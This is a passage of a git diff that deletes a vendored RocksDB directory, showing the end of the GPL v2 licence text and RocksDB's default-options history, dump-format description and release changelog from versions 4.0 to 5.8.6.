-you may at your option offer warranty protection in exchange for a fee.
-
-  2. You may modify your copy or copies of the Program or any portion
-of it, thus forming a work based on the Program, and copy and
-distribute such modifications or work under the terms of Section 1
-above, provided that you also meet all of these conditions:
-
-    a) You must cause the modified files to carry prominent notices
-    stating that you changed the files and the date of any change.
-
-    b) You must cause any work that you distribute or publish, that in
-    whole or in part contains or is derived from the Program or any
-    part thereof, to be licensed as a whole at no charge to all third
-    parties under the terms of this License.
-
-    c) If the modified program normally reads commands interactively
-    when run, you must cause it, when started running for such
-    interactive use in the most ordinary way, to print or display an
-    announcement including an appropriate copyright notice and a
-    notice that there is no warranty (or else, saying that you provide
-    a warranty) and that users may redistribute the program under
-    these conditions, and telling the user how to view a copy of this
-    License.  (Exception: if the Program itself is interactive but
-    does not normally print such an announcement, your work based on
-    the Program is not required to print an announcement.)
-
-These requirements apply to the modified work as a whole.  If
-identifiable sections of that work are not derived from the Program,
-and can be reasonably considered independent and separate works in
-themselves, then this License, and its terms, do not apply to those
-sections when you distribute them as separate works.  But when you
-distribute the same sections as part of a whole which is a work based
-on the Program, the distribution of the whole must be on the terms of
-this License, whose permissions for other licensees extend to the
-entire whole, and thus to each and every part regardless of who wrote it.
-
-Thus, it is not the intent of this section to claim rights or contest
-your rights to work written entirely by you; rather, the intent is to
-exercise the right to control the distribution of derivative or
-collective works based on the Program.
-
-In addition, mere aggregation of another work not based on the Program
-with the Program (or with a work based on the Program) on a volume of
-a storage or distribution medium does not bring the other work under
-the scope of this License.
-
-  3. You may copy and distribute the Program (or a work based on it,
-under Section 2) in object code or executable form under the terms of
-Sections 1 and 2 above provided that you also do one of the following:
-
-    a) Accompany it with the complete corresponding machine-readable
-    source code, which must be distributed under the terms of Sections
-    1 and 2 above on a medium customarily used for software interchange; or,
-
-    b) Accompany it with a written offer, valid for at least three
-    years, to give any third party, for a charge no more than your
-    cost of physically performing source distribution, a complete
-    machine-readable copy of the corresponding source code, to be
-    distributed under the terms of Sections 1 and 2 above on a medium
-    customarily used for software interchange; or,
-
-    c) Accompany it with the information you received as to the offer
-    to distribute corresponding source code.  (This alternative is
-    allowed only for noncommercial distribution and only if you
-    received the program in object code or executable form with such
-    an offer, in accord with Subsection b above.)
-
-The source code for a work means the preferred form of the work for
-making modifications to it.  For an executable work, complete source
-code means all the source code for all modules it contains, plus any
-associated interface definition files, plus the scripts used to
-control compilation and installation of the executable.  However, as a
-special exception, the source code distributed need not include
-anything that is normally distributed (in either source or binary
-form) with the major components (compiler, kernel, and so on) of the
-operating system on which the executable runs, unless that component
-itself accompanies the executable.
-
-If distribution of executable or object code is made by offering
-access to copy from a designated place, then offering equivalent
-access to copy the source code from the same place counts as
-distribution of the source code, even though third parties are not
-compelled to copy the source along with the object code.
-
-  4. You may not copy, modify, sublicense, or distribute the Program
-except as expressly provided under this License.  Any attempt
-otherwise to copy, modify, sublicense or distribute the Program is
-void, and will automatically terminate your rights under this License.
-However, parties who have received copies, or rights, from you under
-this License will not have their licenses terminated so long as such
-parties remain in full compliance.
-
-  5. You are not required to accept this License, since you have not
-signed it.  However, nothing else grants you permission to modify or
-distribute the Program or its derivative works.  These actions are
-prohibited by law if you do not accept this License.  Therefore, by
-modifying or distributing the Program (or any work based on the
-Program), you indicate your acceptance of this License to do so, and
-all its terms and conditions for copying, distributing or modifying
-the Program or works based on it.
-
-  6. Each time you redistribute the Program (or any work based on the
-Program), the recipient automatically receives a license from the
-original licensor to copy, distribute or modify the Program subject to
-these terms and conditions.  You may not impose any further
-restrictions on the recipients' exercise of the rights granted herein.
-You are not responsible for enforcing compliance by third parties to
-this License.
-
-  7. If, as a consequence of a court judgment or allegation of patent
-infringement or for any other reason (not limited to patent issues),
-conditions are imposed on you (whether by court order, agreement or
-otherwise) that contradict the conditions of this License, they do not
-excuse you from the conditions of this License.  If you cannot
-distribute so as to satisfy simultaneously your obligations under this
-License and any other pertinent obligations, then as a consequence you
-may not distribute the Program at all.  For example, if a patent
-license would not permit royalty-free redistribution of the Program by
-all those who receive copies directly or indirectly through you, then
-the only way you could satisfy both it and this License would be to
-refrain entirely from distribution of the Program.
-
-If any portion of this section is held invalid or unenforceable under
-any particular circumstance, the balance of the section is intended to
-apply and the section as a whole is intended to apply in other
-circumstances.
-
-It is not the purpose of this section to induce you to infringe any
-patents or other property right claims or to contest validity of any
-such claims; this section has the sole purpose of protecting the
-integrity of the free software distribution system, which is
-implemented by public license practices.  Many people have made
-generous contributions to the wide range of software distributed
-through that system in reliance on consistent application of that
-system; it is up to the author/donor to decide if he or she is willing
-to distribute software through any other system and a licensee cannot
-impose that choice.
-
-This section is intended to make thoroughly clear what is believed to
-be a consequence of the rest of this License.
-
-  8. If the distribution and/or use of the Program is restricted in
-certain countries either by patents or by copyrighted interfaces, the
-original copyright holder who places the Program under this License
-may add an explicit geographical distribution limitation excluding
-those countries, so that distribution is permitted only in or among
-countries not thus excluded.  In such case, this License incorporates
-the limitation as if written in the body of this License.
-
-  9. The Free Software Foundation may publish revised and/or new versions
-of the General Public License from time to time.  Such new versions will
-be similar in spirit to the present version, but may differ in detail to
-address new problems or concerns.
-
-Each version is given a distinguishing version number.  If the Program
-specifies a version number of this License which applies to it and "any
-later version", you have the option of following the terms and conditions
-either of that version or of any later version published by the Free
-Software Foundation.  If the Program does not specify a version number of
-this License, you may choose any version ever published by the Free Software
-Foundation.
-
-  10. If you wish to incorporate parts of the Program into other free
-programs whose distribution conditions are different, write to the author
-to ask for permission.  For software which is copyrighted by the Free
-Software Foundation, write to the Free Software Foundation; we sometimes
-make exceptions for this.  Our decision will be guided by the two goals
-of preserving the free status of all derivatives of our free software and
-of promoting the sharing and reuse of software generally.
-
-                            NO WARRANTY
-
-  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
-FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
-OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
-PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
-OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
-MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
-TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
-PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
-REPAIR OR CORRECTION.
-
-  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
-WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
-REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
-INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
-OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
-TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
-YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
-PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
-POSSIBILITY OF SUCH DAMAGES.
-
-                     END OF TERMS AND CONDITIONS
-
-            How to Apply These Terms to Your New Programs
-
-  If you develop a new program, and you want it to be of the greatest
-possible use to the public, the best way to achieve this is to make it
-free software which everyone can redistribute and change under these terms.
-
-  To do so, attach the following notices to the program.  It is safest
-to attach them to the start of each source file to most effectively
-convey the exclusion of warranty; and each file should have at least
-the "copyright" line and a pointer to where the full notice is found.
-
-    <one line to give the program's name and a brief idea of what it does.>
-    Copyright (C) <year>  <name of author>
-
-    This program is free software; you can redistribute it and/or modify
-    it under the terms of the GNU General Public License as published by
-    the Free Software Foundation; either version 2 of the License, or
-    (at your option) any later version.
-
-    This program is distributed in the hope that it will be useful,
-    but WITHOUT ANY WARRANTY; without even the implied warranty of
-    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-    GNU General Public License for more details.
-
-    You should have received a copy of the GNU General Public License along
-    with this program; if not, write to the Free Software Foundation, Inc.,
-    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
-
-Also add information on how to contact you by electronic and paper mail.
-
-If the program is interactive, make it output a short notice like this
-when it starts in an interactive mode:
-
-    Gnomovision version 69, Copyright (C) year name of author
-    Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
-    This is free software, and you are welcome to redistribute it
-    under certain conditions; type `show c' for details.
-
-The hypothetical commands `show w' and `show c' should show the appropriate
-parts of the General Public License.  Of course, the commands you use may
-be called something other than `show w' and `show c'; they could even be
-mouse-clicks or menu items--whatever suits your program.
-
-You should also get your employer (if you work as a programmer) or your
-school, if any, to sign a "copyright disclaimer" for the program, if
-necessary.  Here is a sample; alter the names:
-
-  Yoyodyne, Inc., hereby disclaims all copyright interest in the program
-  `Gnomovision' (which makes passes at compilers) written by James Hacker.
-
-  <signature of Ty Coon>, 1 April 1989
-  Ty Coon, President of Vice
-
-This General Public License does not permit incorporating your program into
-proprietary programs.  If your program is a subroutine library, you may
-consider it more useful to permit linking proprietary applications with the
-library.  If this is what you want to do, use the GNU Lesser General
-Public License instead of this License.
diff --git a/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md b/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md
deleted file mode 100644
index 26280ee..0000000
--- a/thirdparty/rocksdb/DEFAULT_OPTIONS_HISTORY.md
+++ /dev/null
@@ -1,24 +0,0 @@
-# RocksDB default options change log
-## Unreleased
-* delayed_write_rate takes the rate given by rate_limiter if not specified.
-
-## 5.2
-* Change the default of delayed slowdown value to 16MB/s and further increase the L0 stop condition to 36 files.
-
-## 5.0 (11/17/2016)
-* Options::allow_concurrent_memtable_write and Options::enable_write_thread_adaptive_yield are now true by default
-* Options.level0_stop_writes_trigger default value changes from 24 to 32.
-
-## 4.8.0 (5/2/2016)
-* options.max_open_files changes from 5000 to -1. It improves performance, but users need to set file descriptor limit to be large enough and watch memory usage for index and bloom filters.
-* options.base_background_compactions changes from max_background_compactions to 1. When users set higher max_background_compactions but the write throughput is not high, the writes are less spiky to disks.
-* options.wal_recovery_mode changes from kTolerateCorruptedTailRecords to kPointInTimeRecovery. Avoid some false positive when file system or hardware reorder the writes for file data and metadata.
-
-## 4.7.0 (4/8/2016)
-* options.write_buffer_size changes from 4MB to 64MB.
-* options.target_file_size_base changes from 2MB to 64MB.
-* options.max_bytes_for_level_base changes from 10MB to 256MB.
-* options.soft_pending_compaction_bytes_limit changes from 0 (disabled) to 64GB.
-* options.hard_pending_compaction_bytes_limit changes from 0 (disabled) to 256GB.
-* table_cache_numshardbits changes from 4 to 6.
-* max_file_opening_threads changes from 1 to 16.
diff --git a/thirdparty/rocksdb/DUMP_FORMAT.md b/thirdparty/rocksdb/DUMP_FORMAT.md
deleted file mode 100644
index 009daba..0000000
--- a/thirdparty/rocksdb/DUMP_FORMAT.md
+++ /dev/null
@@ -1,16 +0,0 @@
-## RocksDB dump format
-
-The version 1 RocksDB dump format is fairly simple:
-
-1) The dump starts with the magic 8 byte identifier "ROCKDUMP"
-
-2) The magic is followed by an 8 byte big-endian version which is 0x00000001.
-
-3) Next are arbitrarily sized chunks of bytes prepended by 4 byte little endian number indicating how large each chunk is.
-
-4) The first chunk is special and is a json string indicating some things about the creation of this dump.  It contains the following keys:
-* database-path: The path of the database this dump was created from.
-* hostname: The hostname of the machine where the dump was created.
-* creation-time: Unix seconds since epoc when this dump was created.
-
-5) Following the info dump the slices paired into are key/value pairs.
diff --git a/thirdparty/rocksdb/HISTORY.md b/thirdparty/rocksdb/HISTORY.md
deleted file mode 100644
index 9156290..0000000
--- a/thirdparty/rocksdb/HISTORY.md
+++ /dev/null
@@ -1,586 +0,0 @@
-# Rocksdb Change Log
-## 5.8.6 (11/20/2017)
-### Bug Fixes
-* Fixed aligned_alloc issues with Windows.
-
-## 5.8.1 (10/23/2017)
-### New Features
-* Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false.
-
-## 5.8.0 (08/30/2017)
-### Public API Change
-* Users of `Statistics::getHistogramString()` will see fewer histogram buckets and different bucket endpoints.
-* `Slice::compare` and BytewiseComparator `Compare` no longer accept `Slice`s containing nullptr.
-* `Transaction::Get` and `Transaction::GetForUpdate` variants with `PinnableSlice` added.
-
-### New Features
-* Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators.
-* Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1.
-* Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`.
-* Allow merge operator to be called even with a single merge operand during compactions, by appropriately overriding `MergeOperator::AllowSingleOperand`.
-* Add `DB::VerifyChecksum()`, which verifies the checksums in all SST files in a running DB.
-* Block-based table support for disabling checksums by setting `BlockBasedTableOptions::checksum = kNoChecksum`.
-
-### Bug Fixes
-* Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`.
-* Fix incorrect dropping of deletions during intra-L0 compaction.
-* Fix transient reappearance of keys covered by range deletions when memtable prefix bloom filter is enabled.
-* Fix potentially wrong file smallest key when range deletions separated by snapshot are written together.
-
-## 5.7.0 (07/13/2017)
-### Public API Change
-* DB property "rocksdb.sstables" now prints keys in hex form.
-
-### New Features
-* Measure estimated number of reads per file. The information can be accessed through DB::GetColumnFamilyMetaData or "rocksdb.sstables" DB property.
-* RateLimiter support for throttling background reads, or throttling the sum of background reads and writes. This can give more predictable I/O usage when compaction reads more data than it writes, e.g., due to lots of deletions.
-* [Experimental] FIFO compaction with TTL support. It can be enabled by setting CompactionOptionsFIFO.ttl > 0.
-* Introduce `EventListener::OnBackgroundError()` callback. Users can implement it to be notified of errors causing the DB to enter read-only mode, and optionally override them.
-* Partitioned Index/Filters exiting the experimental mode. To enable partitioned indexes set index_type to kTwoLevelIndexSearch and to further enable partitioned filters set partition_filters to true. To configure the partition size set metadata_block_size.
-
-
-### Bug Fixes
-* Fix discarding empty compaction output files when `DeleteRange()` is used together with subcompactions.
-
-## 5.6.0 (06/06/2017)
-### Public API Change
-* Scheduling flushes and compactions in the same thread pool is no longer supported by setting `max_background_flushes=0`. Instead, users can achieve this by configuring their high-pri thread pool to have zero threads.
-* Replace `Options::max_background_flushes`, `Options::max_background_compactions`, and `Options::base_background_compactions` all with `Options::max_background_jobs`, which automatically decides how many threads to allocate towards flush/compaction.
-* options.delayed_write_rate by default take the value of options.rate_limiter rate.
-* Replace global variable `IOStatsContext iostats_context` with `IOStatsContext* get_iostats_context()`; replace global variable `PerfContext perf_context` with `PerfContext* get_perf_context()`.
-
-### New Features
-* Change ticker/histogram statistics implementations to use core-local storage. This improves aggregation speed compared to our previous thread-local approach, particularly for applications with many threads.
-* Users can pass a cache object to write buffer manager, so that they can cap memory usage for memtable and block cache using one single limit.
-* Flush will be triggered when 7/8 of the limit introduced by write_buffer_manager or db_write_buffer_size is triggered, so that the hard threshold is hard to hit.
-* Introduce WriteOptions.low_pri. If it is true, low priority writes will be throttled if the compaction is behind.
-* `DB::IngestExternalFile()` now supports ingesting files into a database containing range deletions.
-
-### Bug Fixes
-* Shouldn't ignore return value of fsync() in flush.
-
-## 5.5.0 (05/17/2017)
-### New Features
-* FIFO compaction to support Intra L0 compaction too with CompactionOptionsFIFO.allow_compaction=true.
-* DB::ResetStats() to reset internal stats.
-* Statistics::Reset() to reset user stats.
-* ldb add option --try_load_options, which will open DB with its own option file.
-* Introduce WriteBatch::PopSavePoint to pop the most recent save point explicitly.
-* Support dynamically change `max_open_files` option via SetDBOptions()
-* Added DB::CreateColumnFamilie() and DB::DropColumnFamilies() to bulk create/drop column families.
-* Add debugging function `GetAllKeyVersions` to see internal versions of a range of keys.
-* Support file ingestion with universal compaction style
-* Support file ingestion behind with option `allow_ingest_behind`
-* New option enable_pipelined_write which may improve write throughput in case writing from multiple threads and WAL enabled.
-
-### Bug Fixes
-* Fix the bug that Direct I/O uses direct reads for non-SST file
-
-## 5.4.0 (04/11/2017)
-### Public API Change
-* random_access_max_buffer_size no longer has any effect
-* Removed Env::EnableReadAhead(), Env::ShouldForwardRawRequest()
-* Support dynamically change `stats_dump_period_sec` option via SetDBOptions().
-* Added ReadOptions::max_skippable_internal_keys to set a threshold to fail a request as incomplete when too many keys are being skipped when using iterators.
-* DB::Get in place of std::string accepts PinnableSlice, which avoids the extra memcpy of value to std::string in most of cases.
-    * PinnableSlice releases the pinned resources that contain the value when it is destructed or when ::Reset() is called on it.
-    * The old API that accepts std::string, although discouraged, is still supported.
-* Replace Options::use_direct_writes with Options::use_direct_io_for_flush_and_compaction. Read Direct IO wiki for details.
-* Added CompactionEventListener and EventListener::OnFlushBegin interfaces.
-
-### New Features
-* Memtable flush can be avoided during checkpoint creation if total log file size is smaller than a threshold specified by the user.
-* Introduce level-based L0->L0 compactions to reduce file count, so write delays are incurred less often.
-* (Experimental) Partitioning filters which creates an index on the partitions. The feature can be enabled by setting partition_filters when using kFullFilter. Currently the feature also requires two-level indexing to be enabled. Number of partitions is the same as the number of partitions for indexes, which is controlled by metadata_block_size.
-
-## 5.3.0 (03/08/2017)
-### Public API Change
-* Remove disableDataSync option.
-* Remove timeout_hint_us option from WriteOptions. The option has been deprecated and has no effect since 3.13.0.
-* Remove option min_partial_merge_operands. Partial merge operands will always be merged in flush or compaction if there are more than one.
-* Remove option verify_checksums_in_compaction. Compaction will always verify checksum.
-
-### Bug Fixes
-* Fix the bug that iterator may skip keys
-
-## 5.2.0 (02/08/2017)
-### Public API Change
-* NewLRUCache() will determine number of shard bits automatically based on capacity, if the user doesn't pass one. This also impacts the default block cache when the user doesn't explict provide one.
-* Change the default of delayed slowdown value to 16MB/s and further increase the L0 stop condition to 36 files.
-* Options::use_direct_writes and Options::use_direct_reads are now ready to use.
-* (Experimental) Two-level indexing that partition the index and creates a 2nd level index on the partitions. The feature can be enabled by setting kTwoLevelIndexSearch as IndexType and configuring index_per_partition.
-
-### New Features
-* Added new overloaded function GetApproximateSizes that allows to specify if memtable stats should be computed only without computing SST files' stats approximations.
-* Added new function GetApproximateMemTableStats that approximates both number of records and size of memtables.
-* Add Direct I/O mode for SST file I/O
-
-### Bug Fixes
-* RangeSync() should work if ROCKSDB_FALLOCATE_PRESENT is not set
-* Fix wrong results in a data race case in Get()
-* Some fixes related to 2PC.
-* Fix bugs of data corruption in direct I/O
-
-## 5.1.0 (01/13/2017)
-* Support dynamically change `delete_obsolete_files_period_micros` option via SetDBOptions().
-* Added EventListener::OnExternalFileIngested which will be called when IngestExternalFile() add a file successfully.
-* BackupEngine::Open and BackupEngineReadOnly::Open now always return error statuses matching those of the backup Env.
-
-### Bug Fixes
-* Fix the bug that if 2PC is enabled, checkpoints may loss some recent transactions.
-* When file copying is needed when creating checkpoints or bulk loading files, fsync the file after the file copying.
-
-## 5.0.0 (11/17/2016)
-### Public API Change
-* Options::max_bytes_for_level_multiplier is now a double along with all getters and setters.
-* Support dynamically change `delayed_write_rate` and `max_total_wal_size` options via SetDBOptions().
-* Introduce DB::DeleteRange for optimized deletion of large ranges of contiguous keys.
-* Support dynamically change `delayed_write_rate` option via SetDBOptions().
-* Options::allow_concurrent_memtable_write and Options::enable_write_thread_adaptive_yield are now true by default.
-* Remove Tickers::SEQUENCE_NUMBER to avoid confusion if statistics object is shared among RocksDB instance. Alternatively DB::GetLatestSequenceNumber() can be used to get the same value.
-* Options.level0_stop_writes_trigger default value changes from 24 to 32.
-* New compaction filter API: CompactionFilter::FilterV2(). Allows to drop ranges of keys.
-* Removed flashcache support.
-* DB::AddFile() is deprecated and is replaced with DB::IngestExternalFile(). DB::IngestExternalFile() remove all the restrictions that existed for DB::AddFile.
-
-### New Features
-* Add avoid_flush_during_shutdown option, which speeds up DB shutdown by not flushing unpersisted data (i.e. with disableWAL = true). Unpersisted data will be lost. The options is dynamically changeable via SetDBOptions().
-* Add memtable_insert_with_hint_prefix_extractor option. The option is mean to reduce CPU usage for inserting keys into memtable, if keys can be group by prefix and insert for each prefix are sequential or almost sequential. See include/rocksdb/options.h for more details.
-* Add LuaCompactionFilter in utilities.  This allows developers to write compaction filters in Lua.  To use this feature, LUA_PATH needs to be set to the root directory of Lua.
-* No longer populate "LATEST_BACKUP" file in backup directory, which formerly contained the number of the latest backup. The latest backup can be determined by finding the highest numbered file in the "meta/" subdirectory.
-
-## 4.13.0 (10/18/2016)
-### Public API Change
-* DB::GetOptions() reflect dynamic changed options (i.e. through DB::SetOptions()) and return copy of options instead of reference.
-* Added Statistics::getAndResetTickerCount().
-
-### New Features
-* Add DB::SetDBOptions() to dynamic change base_background_compactions and max_background_compactions.
-* Added Iterator::SeekForPrev(). This new API will seek to the last key that less than or equal to the target key.
-
-## 4.12.0 (9/12/2016)
-### Public API Change
-* CancelAllBackgroundWork() flushes all memtables for databases containing writes that have bypassed the WAL (writes issued with WriteOptions::disableWAL=true) before shutting down background threads.
-* Merge options source_compaction_factor, max_grandparent_overlap_bytes and expanded_compaction_factor into max_compaction_bytes.
-* Remove ImmutableCFOptions.
-* Add a compression type ZSTD, which can work with ZSTD 0.8.0 or up. Still keep ZSTDNotFinal for compatibility reasons.
-
-### New Features
-* Introduce NewClockCache, which is based on CLOCK algorithm with better concurrent performance in some cases. It can be used to replace the default LRU-based block cache and table cache. To use it, RocksDB need to be linked with TBB lib.
-* Change ticker/histogram statistics implementations to accumulate data in thread-local storage, which improves CPU performance by reducing cache coherency costs. Callers of CreateDBStatistics do not need to change anything to use this feature.
-* Block cache mid-point insertion, where index and filter block are inserted into LRU block cache with higher priority. The feature can be enabled by setting BlockBasedTableOptions::cache_index_and_filter_blocks_with_high_priority to true and high_pri_pool_ratio > 0 when creating NewLRUCache.
-
-## 4.11.0 (8/1/2016)
-### Public API Change
-* options.memtable_prefix_bloom_huge_page_tlb_size => memtable_huge_page_size. When it is set, RocksDB will try to allocate memory from huge page for memtable too, rather than just memtable bloom filter.
-
-### New Features
-* A tool to migrate DB after options change. See include/rocksdb/utilities/option_change_migration.h.
-* Add ReadOptions.background_purge_on_iterator_cleanup. If true, we avoid file deletion when destorying iterators.
-
-## 4.10.0 (7/5/2016)
-### Public API Change
-* options.memtable_prefix_bloom_bits changes to options.memtable_prefix_bloom_bits_ratio and deprecate options.memtable_prefix_bloom_probes
-* enum type CompressionType and PerfLevel changes from char to unsigned char. Value of all PerfLevel shift by one.
-* Deprecate options.filter_deletes.
-
-### New Features
-* Add avoid_flush_during_recovery option.
-* Add a read option background_purge_on_iterator_cleanup to avoid deleting files in foreground when destroying iterators. Instead, a job is scheduled in high priority queue and would be executed in a separate background thread.
-* RepairDB support for column families. RepairDB now associates data with non-default column families using information embedded in the SST/WAL files (4.7 or later). For data written by 4.6 or earlier, RepairDB associates it with the default column family.
-* Add options.write_buffer_manager which allows users to control total memtable sizes across multiple DB instances.
-
-## 4.9.0 (6/9/2016)
-### Public API changes
-* Add bottommost_compression option, This option can be used to set a specific compression algorithm for the bottommost level (Last level containing files in the DB).
-* Introduce CompactionJobInfo::compression, This field state the compression algorithm used to generate the output files of the compaction.
-* Deprecate BlockBaseTableOptions.hash_index_allow_collision=false
-* Deprecate options builder (GetOptions()).
-
-### New Features
-* Introduce NewSimCache() in rocksdb/utilities/sim_cache.h. This function creates a block cache that is able to give simulation results (mainly hit rate) of simulating block behavior with a configurable cache size.
-
-## 4.8.0 (5/2/2016)
-### Public API Change
-* Allow preset compression dictionary for improved compression of block-based tables. This is supported for zlib, zstd, and lz4. The compression dictionary's size is configurable via CompressionOptions::max_dict_bytes.
-* Delete deprecated classes for creating backups (BackupableDB) and restoring from backups (RestoreBackupableDB). Now, BackupEngine should be used for creating backups, and BackupEngineReadOnly should be used for restorations. For more details, see https://github.com/facebook/rocksdb/wiki/How-to-backup-RocksDB%3F
-* Expose estimate of per-level compression ratio via DB property: "rocksdb.compression-ratio-at-levelN".
-* Added EventListener::OnTableFileCreationStarted. EventListener::OnTableFileCreated will be called on failure case. User can check creation status via TableFileCreationInfo::status.
-
-### New Features
-* Add ReadOptions::readahead_size. If non-zero, NewIterator will create a new table reader which performs reads of the given size.
-
-## 4.7.0 (4/8/2016)
-### Public API Change
-* rename options compaction_measure_io_stats to report_bg_io_stats and include flush too.
-* Change some default options. Now default options will optimize for server-workloads. Also enable slowdown and full stop triggers for pending compaction bytes. These changes may cause sub-optimal performance or significant increase of resource usage. To avoid these risks, users can open existing RocksDB with options extracted from RocksDB option files. See https://github.com/facebook/rocksdb/wiki/RocksDB-Options-File for how to use RocksDB option files. Or you can call Options.OldDefaults() to recover old defaults. DEFAULT_OPTIONS_HISTORY.md will track change history of default options.
-
-## 4.6.0 (3/10/2016)
-### Public API Changes
-* Change default of BlockBasedTableOptions.format_version to 2. It means default DB created by 4.6 or up cannot be opened by RocksDB version 3.9 or earlier.
-* Added strict_capacity_limit option to NewLRUCache. If the flag is set to true, insert to cache will fail if no enough capacity can be free. Signature of Cache::Insert() is updated accordingly.
-* Tickers [NUMBER_DB_NEXT, NUMBER_DB_PREV, NUMBER_DB_NEXT_FOUND, NUMBER_DB_PREV_FOUND, ITER_BYTES_READ] are not updated immediately. The are updated when the Iterator is deleted.
-* Add monotonically increasing counter (DB property "rocksdb.current-super-version-number") that increments upon any change to the LSM tree.
-
-### New Features
-* Add CompactionPri::kMinOverlappingRatio, a compaction picking mode friendly to write amplification.
-* Deprecate Iterator::IsKeyPinned() and replace it with Iterator::GetProperty() with prop_name="rocksdb.iterator.is.key.pinned"
-
-## 4.5.0 (2/5/2016)
-### Public API Changes
-* Add a new perf context level between kEnableCount and kEnableTime. Level 2 now does not include timers for mutexes.
-* Statistics of mutex operation durations will not be measured by default. If you want to have them enabled, you need to set Statistics::stats_level_ to kAll.
-* DBOptions::delete_scheduler and NewDeleteScheduler() are removed, please use DBOptions::sst_file_manager and NewSstFileManager() instead
-
-### New Features
-* ldb tool now supports operations to non-default column families.
-* Add kPersistedTier to ReadTier.  This option allows Get and MultiGet to read only the persited data and skip mem-tables if writes were done with disableWAL = true.
-* Add DBOptions::sst_file_manager. Use NewSstFileManager() in include/rocksdb/sst_file_manager.h to create a SstFileManager that can be used to track the total size of SST files and control the SST files deletion rate.
-
-## 4.4.0 (1/14/2016)
-### Public API Changes
-* Change names in CompactionPri and add a new one.
-* Deprecate options.soft_rate_limit and add options.soft_pending_compaction_bytes_limit.
-* If options.max_write_buffer_number > 3, writes will be slowed down when writing to the last write buffer to delay a full stop.
-* Introduce CompactionJobInfo::compaction_reason, this field include the reason to trigger the compaction.
-* After slow down is triggered, if estimated pending compaction bytes keep increasing, slowdown more.
-* Increase default options.delayed_write_rate to 2MB/s.
-* Added a new parameter --path to ldb tool. --path accepts the name of either MANIFEST, SST or a WAL file. Either --db or --path can be used when calling ldb.
-
-## 4.3.0 (12/8/2015)
-### New Features
-* CompactionFilter has new member function called IgnoreSnapshots which allows CompactionFilter to be called even if there are snapshots later than the key.
-* RocksDB will now persist options under the same directory as the RocksDB database on successful DB::Open, CreateColumnFamily, DropColumnFamily, and SetOptions.
-* Introduce LoadLatestOptions() in rocksdb/utilities/options_util.h.  This function can construct the latest DBOptions / ColumnFamilyOptions used by the specified RocksDB intance.
-* Introduce CheckOptionsCompatibility() in rocksdb/utilities/options_util.h.  This function checks whether the input set of options is able to open the specified DB successfully.
-
-### Public API Changes
-* When options.db_write_buffer_size triggers, only the column family with the largest column family size will be flushed, not all the column families.
-
-## 4.2.0 (11/9/2015)
-### New Features
-* Introduce CreateLoggerFromOptions(), this function create a Logger for provided DBOptions.
-* Add GetAggregatedIntProperty(), which returns the sum of the GetIntProperty of all the column families.
-* Add MemoryUtil in rocksdb/utilities/memory.h.  It currently offers a way to get the memory usage by type from a list rocksdb instances.
-
-### Public API Changes
-* CompactionFilter::Context includes information of Column Family ID
-* The need-compaction hint given by TablePropertiesCollector::NeedCompact() will be persistent and recoverable after DB recovery. This introduces a breaking format change. If you use this experimental feature, including NewCompactOnDeletionCollectorFactory() in the new version, you may not be able to directly downgrade the DB back to version 4.0 or lower.
-* TablePropertiesCollectorFactory::CreateTablePropertiesCollector() now takes an option Context, containing the information of column family ID for the file being written.
-* Remove DefaultCompactionFilterFactory.
-
-
-## 4.1.0 (10/8/2015)
-### New Features
-* Added single delete operation as a more efficient way to delete keys that have not been overwritten.
-* Added experimental AddFile() to DB interface that allow users to add files created by SstFileWriter into an empty Database, see include/rocksdb/sst_file_writer.h and DB::AddFile() for more info.
-* Added support for opening SST files with .ldb suffix which enables opening LevelDB databases.
-* CompactionFilter now supports filtering of merge operands and merge results.
-
-### Public API Changes
-* Added SingleDelete() to the DB interface.
-* Added AddFile() to DB interface.
-* Added SstFileWriter class.
-* CompactionFilter has a new method FilterMergeOperand() that RocksDB applies to every merge operand during compaction to decide whether to filter the operand.
-* We removed CompactionFilterV2 interfaces from include/rocksdb/compaction_filter.h. The functionality was deprecated already in version 3.13.
-
-## 4.0.0 (9/9/2015)
-### New Features
-* Added support for transactions.  See include/rocksdb/utilities/transaction.h for more info.
